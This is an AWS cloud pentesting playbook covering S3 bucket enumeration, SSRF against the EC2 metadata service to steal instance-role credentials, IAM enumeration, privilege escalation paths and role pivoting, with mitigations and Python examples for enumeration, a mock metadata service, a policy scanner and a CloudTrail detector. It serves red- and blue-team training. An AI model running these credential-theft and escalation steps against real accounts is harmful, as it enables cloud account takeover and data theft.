AWS Cloud Pentesting Playbook
This playbook outlines foundational concepts of AWS architecture and provides technical guidance and attack strategies derived from practical labs and real-world exploitation scenarios. Each section includes purpose, context, exploitation techniques, AWS CLI commands, and mitigation strategies to guide red teamers, cloud security engineers, and blue teams.
1. AWS Cloud Architecture
Cloud Space Overview
Purpose: Understand the AWS architectural layers and where each one exposes an attack surface.
Front-End: AWS Management Console (web GUI). The CLI and SDKs call the same public APIs, so console access and API credentials are equivalent from an attacker's point of view.
Control Plane: The AWS API layer that orchestrates services (e.g., EC2 start/stop, IAM configuration). Every call is authorized by IAM, and management calls are recorded by CloudTrail.
Data Plane: The resources and data the control plane manages (e.g., objects in S3, processes on an EC2 instance).
Security Insight:
Control Plane compromise (valid IAM credentials with broad permissions) = the attacker can create, modify and delete any resource that identity may touch, up to full account takeover.
Data Plane compromise (code execution on an instance, a readable bucket) = data exfiltration and service abuse, and often a path back into the control plane through the instance role's credentials.
2. Entry Point Identification
S3 Bucket Enumeration
Purpose: Identify open buckets leaking data.
Tools:
osint.sh (domain/asset discovery, used to collect keywords such as company, product and project names)
cloud_enum (takes a keyword, generates bucket-name mutations, and reports which names exist and which are listable without credentials)
Command:
cloud_enum -k examplecorp -l results.txt
Example Attack:
http://public-examplecorp.s3.amazonaws.com/internal-ip.txt
A bucket that answers an unauthenticated GET on its root with a ListBucketResult is publicly listable. A 403 (AccessDenied) still confirms the bucket name exists and individual objects may be readable; a 404 (NoSuchBucket) means the name is unused.
Mitigation:
Disable public access unless required (S3 Block Public Access at the account level as well as per bucket).
Enforce IAM and bucket policies and block public ACLs. Bucket names are global and guessable, so treat them as public information, never as a secret.
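The enumeration step above in code, as an added example that is not part of the original playbook: it builds cloud_enum-style name candidates from a keyword and classifies the raw S3 response for each name the way the tool (or `aws s3 ls s3://<bucket> --no-sign-request`) would. The mutation list is an assumption (cloud_enum ships a far longer one), and the XML bodies are constructed stand-ins for the three outcomes an enumerator sees, not captured from a real bucket.

```python
"""Added example, not from the original playbook: cloud_enum-style bucket name
candidates for a keyword, plus classification of the raw S3 response.
MUTATIONS is an assumed short list; the XML samples are constructed."""
import xml.etree.ElementTree as ET

MUTATIONS = ["-dev", "-prod", "-backup", "-logs", "-public", "-internal"]
S3_NS = "{http://s3.amazonaws.com/doc/2006-03-01/}"
# Object names worth pulling first: secrets, dumps, or anything labelled internal.
SUSPICIOUS_SUFFIXES = (".env", ".pem", ".key", ".sql", ".bak", ".tfstate")
SUSPICIOUS_WORDS = ("internal", "secret", "credential", "password", "backup")

def bucket_candidates(keyword):
    """keyword plus each mutation as suffix (examplecorp-dev) and prefix (dev-examplecorp)."""
    names = {keyword}
    for m in MUTATIONS:
        names.add(f"{keyword}{m}")
        names.add(f"{m.strip('-')}-{keyword}")
    return sorted(names)

def classify_s3_response(status, body):
    """Classify the result of an unauthenticated GET https://<bucket>.s3.amazonaws.com/.
    Returns (state, keys): state is 'missing', 'private', 'public-listing' or
    'unknown'; keys holds object names only for a public listing."""
    root = ET.fromstring(body)
    if root.tag == "Error":
        code = root.findtext("Code")
        # NoSuchBucket: the name is free. AccessDenied: the bucket exists, anonymous
        # listing is blocked, but individual objects may still be readable.
        return ("missing", []) if (code == "NoSuchBucket" or status == 404) else ("private", [])
    if status == 200 and root.tag == S3_NS + "ListBucketResult":
        return ("public-listing", [k.text for k in root.iter(S3_NS + "Key")])
    return ("unknown", [])

def interesting_keys(keys):
    """Order-preserving filter for objects that usually hold secrets or data."""
    return [k for k in keys
            if k.lower().endswith(SUSPICIOUS_SUFFIXES)
            or any(w in k.lower() for w in SUSPICIOUS_WORDS)]

# Constructed responses standing in for the three outcomes an enumerator sees.
SAMPLE_LISTING = """<?xml version="1.0" encoding="UTF-8"?>
<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
  <Name>public-examplecorp</Name>
  <Contents><Key>internal-ip.txt</Key><Size>41</Size></Contents>
  <Contents><Key>backups/db.sql</Key><Size>40960</Size></Contents>
  <Contents><Key>logo.png</Key><Size>1024</Size></Contents>
</ListBucketResult>"""
SAMPLE_DENIED = """<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message></Error>"""
SAMPLE_MISSING = """<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message></Error>"""

if __name__ == "__main__":
    print("candidates for examplecorp:", bucket_candidates("examplecorp"))
    for status, body in ((200, SAMPLE_LISTING), (403, SAMPLE_DENIED), (404, SAMPLE_MISSING)):
        state, keys = classify_s3_response(status, body)
        print(status, state, interesting_keys(keys))
```

The 403 branch is the one people get wrong: an AccessDenied on the listing only says the bucket is not listable, so the next step is still to try direct object URLs such as the internal-ip.txt example above.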
3. SSRF to EC2 Metadata Extraction
Purpose: Abuse SSRF to steal the temporary credentials of the instance's IAM role.
Target Endpoint: http://169.254.169.254/latest/meta-data/ (link-local, reachable only from the instance itself, which is why an SSRF bug in an application running there is the usual way in)
Command Sequence:
curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>
The second call lists the role attached to the instance; the third returns AccessKeyId (ASIA...), SecretAccessKey, Token and Expiration. These are STS credentials for the instance role and work from anywhere until they expire. When IMDSv2 is enforced, the same reads require a session token first (PUT /latest/api/token with the X-aws-ec2-metadata-token-ttl-seconds header, then GET with X-aws-ec2-metadata-token), which a GET-only SSRF cannot supply.
Mitigation:
Require IMDSv2 (HttpTokens=required in the instance metadata options) and keep the PUT response hop limit at 1 unless containers on the host need the service.
Restrict outbound traffic from EC2 instances and scope the instance role to the permissions the workload actually needs. GuardDuty's InstanceCredentialExfiltration findings flag instance-role credentials used from outside the instance.
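To make the IMDSv1/IMDSv2 difference concrete, here is an added example (not code from the original playbook): a local mock of the metadata service that can run in HttpTokens=optional or HttpTokens=required mode, the header-less GET a typical SSRF primitive gives an attacker, and the PUT-then-GET token flow a legitimate client performs. It listens on 127.0.0.1 in place of 169.254.169.254, the role name is an assumption and the credentials it returns are fake.

```python
"""Added example, not from the original playbook: mock IMDS in v1/v2 mode and
the two request styles against it. Role name and credentials are constructed."""
import json
import secrets
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.request import Request, urlopen

ROLE = "examplecorp-web-role"  # assumed instance-role name
FAKE_CREDS = {"AccessKeyId": "ASIAEXAMPLE000000000", "SecretAccessKey": "constructed",
              "Token": "constructed-session-token", "Expiration": "2030-01-01T00:00:00Z"}
CREDS_PATH = "/latest/meta-data/iam/security-credentials/"

class ImdsHandler(BaseHTTPRequestHandler):
    tokens = set()  # session tokens issued by PUT /latest/api/token

    def log_message(self, *args):  # keep the demo quiet
        pass

    def do_PUT(self):
        # IMDSv2 session start: a PUT carrying a TTL header returns a token.
        if self.path == "/latest/api/token" and self.headers.get("X-aws-ec2-metadata-token-ttl-seconds"):
            token = secrets.token_urlsafe(32)
            self.tokens.add(token)
            self._reply(200, token)
        else:
            self._reply(400, "")

    def do_GET(self):
        # In required mode every read must carry a token from a prior PUT;
        # a GET-only SSRF cannot set that header, so it stops here with 401.
        if self.server.require_token and self.headers.get("X-aws-ec2-metadata-token") not in self.tokens:
            self._reply(401, "")
        elif self.path == CREDS_PATH:
            self._reply(200, ROLE)
        elif self.path == CREDS_PATH + ROLE:
            self._reply(200, json.dumps(FAKE_CREDS))
        else:
            self._reply(404, "")

    def _reply(self, code, body):
        data = body.encode()
        self.send_response(code)
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

def start_mock_imds(require_token=True):
    """Start the mock on an ephemeral port; require_token mirrors HttpTokens."""
    srv = HTTPServer(("127.0.0.1", 0), ImdsHandler)
    srv.require_token = require_token
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return f"http://127.0.0.1:{srv.server_port}"

def ssrf_style_get(base, path):
    """Plain GET with no custom headers: what most SSRF primitives can send.
    Returns the HTTP status code."""
    try:
        return urlopen(Request(base + path)).status
    except HTTPError as err:
        return err.code

def imdsv2_fetch_credentials(base):
    """Legitimate client flow: PUT for a token, then GET the role and its creds."""
    token_req = Request(base + "/latest/api/token", method="PUT",
                        headers={"X-aws-ec2-metadata-token-ttl-seconds": "21600"})
    token = urlopen(token_req).read().decode()
    hdr = {"X-aws-ec2-metadata-token": token}
    role = urlopen(Request(base + CREDS_PATH, headers=hdr)).read().decode()
    creds = urlopen(Request(base + CREDS_PATH + role, headers=hdr)).read()
    return role, json.loads(creds)

if __name__ == "__main__":
    for required in (False, True):
        base = start_mock_imds(require_token=required)
        print(f"HttpTokens={'required' if required else 'optional'}: "
              f"plain GET -> {ssrf_style_get(base, CREDS_PATH)}")
    print("IMDSv2 client flow ->", imdsv2_fetch_credentials(base))
```

The caveat this shows is that IMDSv2 only raises the bar to "SSRF that can send a PUT with a custom header and chain a second request", which some primitives (full request control, gopher-style smuggling) still satisfy; the outbound restriction and a tightly scoped instance role are what limit the damage when that happens.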
4. Credential Injection and Identity Confirmation
Using Leaked/Extracted Credentials
Setup Profile:
aws configure --profile pentest-profile
Or edit ~/.aws/credentials:
[pentest-profile]
aws_access_key_id = AKIA...
aws_secret_access_key = ...
aws_session_token = ...
(aws_session_token is only needed for temporary ASIA credentials such as those taken from the metadata service; leave it out for long-term AKIA keys.)
Verify Identity:
aws sts get-caller-identity --profile pentest-profile
The response gives the account ID, the principal ARN (user, assumed role or root) and, for assumed roles, the session name; an EC2 instance-profile session is named after the instance ID (i-...). GetCallerIdentity requires no permissions and cannot be denied by policy, so it is the safest first call with unknown credentials, but it is still written to CloudTrail.
Mitigation:
Monitor STS usage: alert on GetCallerIdentity and AssumeRole calls from unexpected source IPs or user agents, and on instance-role credentials used from outside the instance.
Rotate credentials regularly and revoke them immediately when a leak is suspected (deactivate the access key; for role sessions, attach a deny policy conditioned on aws:TokenIssueTime).
5. IAM Enumeration
Purpose: Discover all user/group/role/policy relationships, i.e., the effective permissions of the compromised principal and the roles it could move into.
Commands:
aws iam get-user --profile pentest-profile
aws iam list-groups-for-user --user-name dev-user --profile pentest-profile
aws iam list-roles --profile pentest-profile
aws iam list-attached-user-policies --user-name dev-user --profile pentest-profile
aws iam list-user-policies --user-name dev-user --profile pentest-profile
aws iam get-user-policy --user-name dev-user --policy-name DevPolicy --profile pentest-profile
get-user without --user-name returns the calling user. Permissions come from three places: managed policies attached to the user, inline user policies, and the attached and inline policies of every group returned by list-groups-for-user; all three have to be read to know what the principal can do. In the list-roles output, each role's AssumeRolePolicyDocument (the trust policy) names the principals allowed to assume it, which is the map for later pivots. Enumeration calls fail with AccessDenied when the principal lacks iam:Get*/iam:List*, and every attempt, successful or not, is logged.
Mitigation:
Regularly audit users and their permissions (IAM Access Analyzer and the credential report help here).
Restrict over-privileged accounts, and limit iam:Get*/iam:List* to principals that need them: enumeration is the first thing an attacker with stolen keys does.
6. AWS Credential Types
Long-Term vs Short-Term Keys
Identification:
echo $AWS_ACCESS_KEY_ID
# AKIA → long-term access key belonging to an IAM user; valid until deactivated or deleted
# ASIA → temporary credentials issued by STS (assumed role, federation, GetSessionToken); need aws_session_token and expire on their own
Mitigation:
Use IAM roles and short-term credentials so that a leaked key stops working by itself.
Avoid hardcoding credentials; a long-term key in a repository, an AMI or user-data stays valid until someone notices.
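The two checks from sections 4 and 6 (key prefix, then the caller identity) as one small triage helper, added here as an example rather than code from the original playbook. It parses the JSON that `aws sts get-caller-identity` prints and flags the instance-ID session name that marks credentials lifted from the metadata service. The sample response is constructed; the account, role and instance IDs are placeholders.

```python
"""Added example, not from the original playbook: classify a leaked credential
from its key-ID prefix and from the GetCallerIdentity response. The JSON below
is constructed; account, role and instance IDs are placeholders."""
import json

KEY_PREFIXES = {  # IAM unique-ID prefixes
    "AKIA": "long-term access key of an IAM user; no session token; valid until deactivated",
    "ASIA": "temporary STS credentials; aws_session_token required; expire on their own",
}

def classify_access_key(key_id):
    return KEY_PREFIXES.get(key_id[:4], "unrecognised prefix")

def parse_caller_identity(raw_json):
    """Break the GetCallerIdentity ARN into account, principal type and names."""
    ident = json.loads(raw_json)
    arn = ident["Arn"]
    # arn:partition:service:region:account:resource (region is empty for IAM/STS)
    _arn, _partition, _service, _region, account, resource = arn.split(":", 5)
    parts = resource.split("/")
    info = {"account": account, "arn": arn, "user_id": ident.get("UserId", ""),
            "type": parts[0], "name": parts[-1], "session": None, "from_ec2_instance": False}
    if parts[0] == "assumed-role":
        # arn:aws:sts::<account>:assumed-role/<RoleName>/<SessionName>
        info["name"], info["session"] = parts[1], parts[2]
        # EC2 instance-profile sessions are named after the instance ID; seeing
        # one from a pentest box means the credentials came out of IMDS.
        info["from_ec2_instance"] = parts[2].startswith("i-")
    elif parts[0] == "root":
        info["name"] = "root"
    return info

def describe_credentials(key_id, caller_identity_json):
    """One-line triage summary joining both signals."""
    info = parse_caller_identity(caller_identity_json)
    origin = " (instance-profile credentials, likely from IMDS)" if info["from_ec2_instance"] else ""
    return f"{key_id[:4]} key -> {info['type']} {info['name']} in account {info['account']}{origin}"

# Constructed get-caller-identity output for credentials pulled from an instance.
SAMPLE_IDENTITY = json.dumps({
    "UserId": "AROAEXAMPLEROLEID:i-0abc123def4567890",
    "Account": "123456789012",
    "Arn": "arn:aws:sts::123456789012:assumed-role/examplecorp-web-role/i-0abc123def4567890",
})

if __name__ == "__main__":
    print(classify_access_key("ASIAEXAMPLE000000000"))
    print(describe_credentials("ASIAEXAMPLE000000000", SAMPLE_IDENTITY))
```

Defenders can run the same logic over CloudTrail's userIdentity.arn: an assumed-role session named after an instance ID whose sourceIPAddress is not that instance is the pattern behind the GuardDuty InstanceCredentialExfiltration findings.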
7. Privilege Escalation Techniques
1. Create New Policy Version
iam:CreatePolicyVersion (on a customer-managed policy attached to the attacker's user, group or role)
Attack: Create a new version that allows everything and set it as the default version. iam:SetDefaultPolicyVersion is not needed when the version is created with --set-as-default.
2. Pass Existing Role to EC2
iam:PassRole + ec2:RunInstances
Attack: Launch an instance with an instance profile that carries a privileged role, then read that role's credentials from the instance metadata service (or have the user-data script send them out).
3. Attach Policy to Self
iam:AttachUserPolicy, iam:AttachGroupPolicy, iam:AttachRolePolicy
Attack: Attach an AWS managed policy such as AdministratorAccess to the attacker's own user, to a group the user belongs to, or to a role the attacker can assume.
4. Modify Trust Policy
iam:UpdateAssumeRolePolicy
Attack: Rewrite a privileged role's trust policy to allow the attacker's principal, then sts:AssumeRole into it.
Mitigation (all):
Restrict risky IAM actions: scope iam:PassRole with a Resource list and an iam:PassedToService condition, and keep the actions above off developer policies.
Monitor CloudTrail logs for policy updates. Explicit Deny statements, permission boundaries and SCPs close these paths even where an Allow exists.
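The four paths above as a static check, added here as an example and not part of the original playbook: it takes policy documents as printed by `aws iam get-policy-version` or `get-user-policy` and reports which escalation paths the combined Allow statements open. Wildcards in Action and explicit Deny statements are honoured; Resource and Condition are not evaluated, so a hit is a lead for manual review, not a confirmed escalation. The policies are constructed.

```python
"""Added example, not from the original playbook: scan IAM policy documents
for the CreatePolicyVersion, PassRole+RunInstances, Attach*Policy and
UpdateAssumeRolePolicy escalation paths. Sample policies are constructed."""
import fnmatch
import json

# Each path is a list of alternative action sets; any set fully allowed = path open.
ESCALATION_PATHS = {
    "CreatePolicyVersion": [{"iam:CreatePolicyVersion"}],
    "PassRole+RunInstances": [{"iam:PassRole", "ec2:RunInstances"}],
    "AttachPolicy": [{"iam:AttachUserPolicy"}, {"iam:AttachGroupPolicy"}, {"iam:AttachRolePolicy"}],
    "UpdateAssumeRolePolicy": [{"iam:UpdateAssumeRolePolicy"}],
}

def _as_list(value):
    return value if isinstance(value, list) else [value]

def document_from_cli(output):
    """Unwrap the document from get-policy-version or get-user-policy JSON output."""
    data = json.loads(output)
    if "PolicyVersion" in data:
        return data["PolicyVersion"]["Document"]
    return data["PolicyDocument"]

def split_actions(doc):
    """Return (allow_patterns, deny_patterns) from one policy document.
    NotAction statements are skipped here and need a manual look."""
    allows, denies = [], []
    for st in _as_list(doc["Statement"]):
        if "Action" not in st:
            continue
        bucket = allows if st.get("Effect") == "Allow" else denies
        bucket.extend(a.lower() for a in _as_list(st["Action"]))
    return allows, denies

def action_permitted(action, allows, denies):
    """IAM evaluation in miniature: an explicit Deny always beats an Allow."""
    action = action.lower()
    if any(fnmatch.fnmatchcase(action, d) for d in denies):
        return False
    return any(fnmatch.fnmatchcase(action, a) for a in allows)

def find_escalation_paths(docs):
    """Names of the paths open across all policies attached to one principal."""
    allows, denies = [], []
    for doc in docs:
        a, d = split_actions(doc)
        allows += a
        denies += d
    return [name for name, alternatives in ESCALATION_PATHS.items()
            if any(all(action_permitted(x, allows, denies) for x in combo)
                   for combo in alternatives)]

# Constructed policies: a developer policy, an explicit deny, and full admin.
DEV_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": ["ec2:Describe*", "ec2:RunInstances", "iam:PassRole"], "Resource": "*"},
    {"Effect": "Allow", "Action": ["iam:Get*", "iam:List*"], "Resource": "*"}]}
DENY_PASSROLE = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Deny", "Action": "iam:PassRole", "Resource": "*"}]}
ADMIN_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": "*", "Resource": "*"}]}
# What get-policy-version prints for DEV_POLICY (constructed wrapper).
SAMPLE_GET_POLICY_VERSION = json.dumps(
    {"PolicyVersion": {"Document": DEV_POLICY, "VersionId": "v1", "IsDefaultVersion": True}})

if __name__ == "__main__":
    print("dev only   :", find_escalation_paths([document_from_cli(SAMPLE_GET_POLICY_VERSION)]))
    print("dev + deny :", find_escalation_paths([DEV_POLICY, DENY_PASSROLE]))
    print("admin      :", find_escalation_paths([ADMIN_POLICY]))
```

Run it over every document gathered in section 5 (user, inline and group policies together), because the PassRole and RunInstances halves of path 2 are often granted by two different policies and look harmless on their own.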
8. API Gateway & Lambda Enumeration
Concept: Using Read-Only Permissions to Enumerate and Access Internal APIs
Step-by-Step Exploitation:
Identify current user:
aws iam get-user --profile pentest-profile
List attached user policies:
aws iam list-attached-user-policies --user-name <username> --profile pentest-profile
Get policy ARN and version:
aws iam get-policy --policy-arn arn:aws:iam::<account>:policy/<policy-name> --profile pentest-profile
aws iam get-policy-version --policy-arn arn:aws:iam::<account>:policy/<policy-name> --version-id <version-id> --profile pentest-profile
Look for apigateway:GET permissions (API Gateway's control-plane actions are named after HTTP verbs, so GET is the read-only right covering lists of APIs, resources and stages) alongside lambda:ListFunctions and lambda:GetPolicy.
List Lambda functions:
aws lambda list-functions --region us-west-2 --profile pentest-profile
Get the function's resource-based policy (who is allowed to invoke it; this is not the execution role):
aws lambda get-policy --function-name <function-name> --region us-west-2 --profile pentest-profile
A statement for the apigateway.amazonaws.com principal with an AWS:SourceArn condition reveals the execute-api ARN of the API Gateway fronting the function: arn:aws:execute-api:<region>:<account>:<api-id>/<stage>/<method>/<path>.
Get API Gateway stages:
aws apigateway get-stages --rest-api-id <api-id> --region us-west-2 --profile pentest-profile
Visit discovered endpoint:
https://<api-id>.execute-api.us-west-2.amazonaws.com/<stage>/<resource>
Security Insight:
Chaining Lambda resource policies and API Gateway resources lets an attacker find and invoke undocumented APIs without holding lambda:InvokeFunction, because the HTTP endpoint may have no authorizer at all.
Least privilege IAM roles and separation of read/write policies are critical; read access to configuration is enough to map the attack surface.
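The policy-to-URL step of that chain in code, added here as an example that is not part of the original playbook: it reads the JSON that `aws lambda get-policy` prints (the policy document is a JSON string inside JSON), pulls out each execute-api source ARN and turns it into the invoke URL to try, taking the stage name from `get-stages` when the ARN uses a wildcard. The get-policy output is constructed; the API ID, account, function name and stage are placeholders.

```python
"""Added example, not from the original playbook: from `aws lambda get-policy`
output to API Gateway invoke URLs. The sample output is constructed; API id,
account, function and stage names are placeholders."""
import json

def execute_api_sources(get_policy_output):
    """Return parsed execute-api ARNs from the function's resource-based policy."""
    policy = json.loads(json.loads(get_policy_output)["Policy"])
    found = []
    for st in policy.get("Statement", []):
        if st.get("Effect") != "Allow":
            continue
        for operator, keys in st.get("Condition", {}).items():
            if operator not in ("ArnLike", "ArnEquals"):
                continue
            for key, value in keys.items():
                # API Gateway writes the key as "AWS:SourceArn"; compare case-insensitively.
                if key.lower() != "aws:sourcearn":
                    continue
                for arn in (value if isinstance(value, list) else [value]):
                    info = parse_execute_api_arn(arn)
                    if info:
                        found.append(info)
    return found

def parse_execute_api_arn(arn):
    """arn:aws:execute-api:<region>:<account>:<api-id>/<stage>/<method>/<path>"""
    _arn, _partition, service, region, account, resource = arn.split(":", 5)
    if service != "execute-api":
        return None
    api_id, stage, method, path = (resource.split("/", 3) + ["", "", ""])[:4]
    return {"region": region, "account": account, "api_id": api_id,
            "stage": stage, "method": method, "path": path}

def invoke_url(info, stage=None):
    """Build the public URL. A '*' stage in the ARN means any stage: take the
    concrete name from `aws apigateway get-stages` and pass it in."""
    chosen = info["stage"] if info["stage"] not in ("*", "") else stage
    if not chosen:
        raise ValueError("stage unknown: read it from get-stages")
    return f"https://{info['api_id']}.execute-api.{info['region']}.amazonaws.com/{chosen}/{info['path']}"

# Constructed get-policy output for a function fronted by API Gateway.
SAMPLE_GET_POLICY = json.dumps({
    "Policy": json.dumps({"Version": "2012-10-17", "Id": "default", "Statement": [{
        "Sid": "apigw-invoke", "Effect": "Allow",
        "Principal": {"Service": "apigateway.amazonaws.com"},
        "Action": "lambda:InvokeFunction",
        "Resource": "arn:aws:lambda:us-west-2:123456789012:function:internal-users",
        "Condition": {"ArnLike": {"AWS:SourceArn":
            "arn:aws:execute-api:us-west-2:123456789012:abc123def4/*/GET/internal/users"}}}]}),
    "RevisionId": "constructed-revision-id",
})

if __name__ == "__main__":
    for src in execute_api_sources(SAMPLE_GET_POLICY):
        print(src["method"], invoke_url(src, stage="prod"))
```

When the ARN's method and path are also wildcards, `aws apigateway get-resources --rest-api-id <api-id>` lists the concrete paths and methods to fill in.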
9. Key Attack Scenarios Summary
Attack Vector                     | Tools/Technique        | Goal
----------------------------------|------------------------|-------------------------------------
Public S3 Buckets                 | cloud_enum             | Find leaked configs/creds
SSRF to Metadata                  | curl, web exploit      | Extract STS creds
IAM Enumeration & Abuse           | aws iam list-*         | Discover and misuse privileges
Abusing STS Temporary Tokens      | aws sts                | Lateral movement
Misconfigured Trust Relationships | AssumeRole abuse       | Privileged role pivoting
Lambda Exposure via API Gateway   | apigateway, lambda CLI | Discover and invoke hidden resources
10. AWS Services Recap (Security Lens)
IAM
Central identity system; every control-plane call is authorized here.
Monitor role assumptions.
Use permission boundaries and SCPs to cap what even an administrative principal can grant.
EC2
Protect the metadata service (require IMDSv2).
Monitor user-data for secrets; user-data is readable from inside the instance and by anyone with ec2:DescribeInstanceAttribute.
S3
Disable public buckets (Block Public Access).
Enforce bucket policies and enable access logs.
Lambda
Lock down resource-based (invoke) policies and execution roles.
Avoid wide API Gateway access.
API Gateway
Monitor stage and resource exposure.
Validate CORS and auth settings; a method with no authorizer and no API key requirement is public to anyone who learns the URL.
CloudTrail & GuardDuty
Enable full logging (all regions, management events, and S3/Lambda data events where the cost is acceptable).
Alert on anomalous API usage (e.g., sts:AssumeRole, iam:PassRole).
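The alerting advice above as a small detector, added here as an example and not part of the original playbook: it triages CloudTrail records for the IAM changes from section 7 and the role pivots this section calls out, keeps denied attempts as low-severity signals, and flags a user attaching a policy to itself. The records are constructed and trimmed to the fields the logic reads; real records carry many more.

```python
"""Added example, not from the original playbook: triage CloudTrail records for
privilege changes and role pivots. The records are constructed, not real logs."""
import json

WATCHED = {  # eventName -> what it means for the account
    "CreatePolicyVersion": "new version of a managed policy",
    "UpdateAssumeRolePolicy": "role trust policy changed",
    "AttachUserPolicy": "managed policy attached to a user",
    "AttachGroupPolicy": "managed policy attached to a group",
    "AttachRolePolicy": "managed policy attached to a role",
    "AssumeRole": "role assumed",
    "RunInstances": "instance launched with a role passed to it",
}
HIGH = {"UpdateAssumeRolePolicy", "AttachRolePolicy", "AttachGroupPolicy", "RunInstances"}

def triage_event(ev):
    """Return an alert dict for a record worth a look, or None."""
    name = ev.get("eventName")
    if name not in WATCHED:
        return None
    params = ev.get("requestParameters") or {}
    who = ev.get("userIdentity") or {}
    if name == "RunInstances" and not params.get("iamInstanceProfile"):
        return None                                   # plain launch, no PassRole
    alert = {"severity": "high" if name in HIGH else "medium", "event": name,
             "actor": who.get("arn", "?"), "source_ip": ev.get("sourceIPAddress"),
             "reason": WATCHED[name]}
    if ev.get("errorCode"):
        # A denied privilege change still says someone is probing.
        alert.update(severity="low", reason=f"{WATCHED[name]} attempted, denied ({ev['errorCode']})")
        return alert
    if name == "CreatePolicyVersion" and params.get("setAsDefault"):
        alert.update(severity="high", reason=alert["reason"] + ", set as default")
    if name == "AttachUserPolicy" and params.get("userName") == who.get("userName"):
        alert.update(severity="high", reason=alert["reason"] + " (caller attached it to itself)")
    if name == "AssumeRole" and who.get("type") == "IAMUser":
        alert["reason"] += f" by an IAM user: {params.get('roleArn')}"
    return alert

def triage(records):
    return [a for a in map(triage_event, records) if a]

def load_cloudtrail(text):
    """Accept a CloudTrail log file body ({"Records": [...]}) or a bare JSON array."""
    data = json.loads(text)
    return data["Records"] if isinstance(data, dict) else data

_DEV = {"type": "IAMUser", "userName": "dev-user", "arn": "arn:aws:iam::123456789012:user/dev-user"}
SAMPLE_RECORDS = json.dumps({"Records": [   # constructed, not real log lines
    {"eventName": "DescribeInstances", "userIdentity": _DEV, "sourceIPAddress": "203.0.113.10"},
    {"eventName": "AttachUserPolicy", "userIdentity": _DEV, "sourceIPAddress": "203.0.113.10",
     "requestParameters": {"userName": "dev-user",
                           "policyArn": "arn:aws:iam::aws:policy/AdministratorAccess"}},
    {"eventName": "RunInstances", "userIdentity": _DEV, "sourceIPAddress": "203.0.113.10",
     "requestParameters": {"iamInstanceProfile": {"arn": "arn:aws:iam::123456789012:instance-profile/admin-profile"}}},
    {"eventName": "RunInstances", "userIdentity": _DEV, "sourceIPAddress": "203.0.113.10",
     "requestParameters": {"instanceType": "t3.micro"}},
    {"eventName": "CreatePolicyVersion", "userIdentity": _DEV, "sourceIPAddress": "203.0.113.10",
     "errorCode": "AccessDenied",
     "requestParameters": {"policyArn": "arn:aws:iam::123456789012:policy/DevPolicy", "setAsDefault": True}},
    {"eventName": "AssumeRole", "userIdentity": _DEV, "sourceIPAddress": "203.0.113.10",
     "requestParameters": {"roleArn": "arn:aws:iam::123456789012:role/admin-role", "roleSessionName": "x"}},
]})

if __name__ == "__main__":
    for alert in triage(load_cloudtrail(SAMPLE_RECORDS)):
        print(f"[{alert['severity']:<6}] {alert['event']:<22} {alert['actor']} {alert['reason']}")
```

In a real pipeline the same function runs over the gzipped objects CloudTrail delivers to S3 or over an EventBridge rule on the IAM and STS event names; the point of keeping the denied attempts is that a probe for CreatePolicyVersion usually precedes the one that works.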
11. AWS Pentesting Flow Summary
Reconnaissance
Tools: cloud_enum, osint.sh, aws sts get-caller-identity (the AWS equivalent of whoami)
Targets: IAM users, S3, EC2 metadata, Lambda/APIGW
Exploitation
SSRF → Metadata → STS tokens
IAM → Privilege escalation
Post-Exploitation
Use AWS CLI for enumeration
Dump data (S3), invoke functions (Lambda), pivot roles (STS)
Lateral Movement
Abuse trust policies
Pivot with aws sts assume-role: the source principal leaves a single AssumeRole event in CloudTrail, and everything afterwards is logged under the assumed role's session, where it blends in with legitimate automation
End of Playbook
This playbook emphasizes both offensive and defensive approaches to AWS environments. Proper hardening, monitoring, and the principle of least privilege are key to reducing attack surfaces.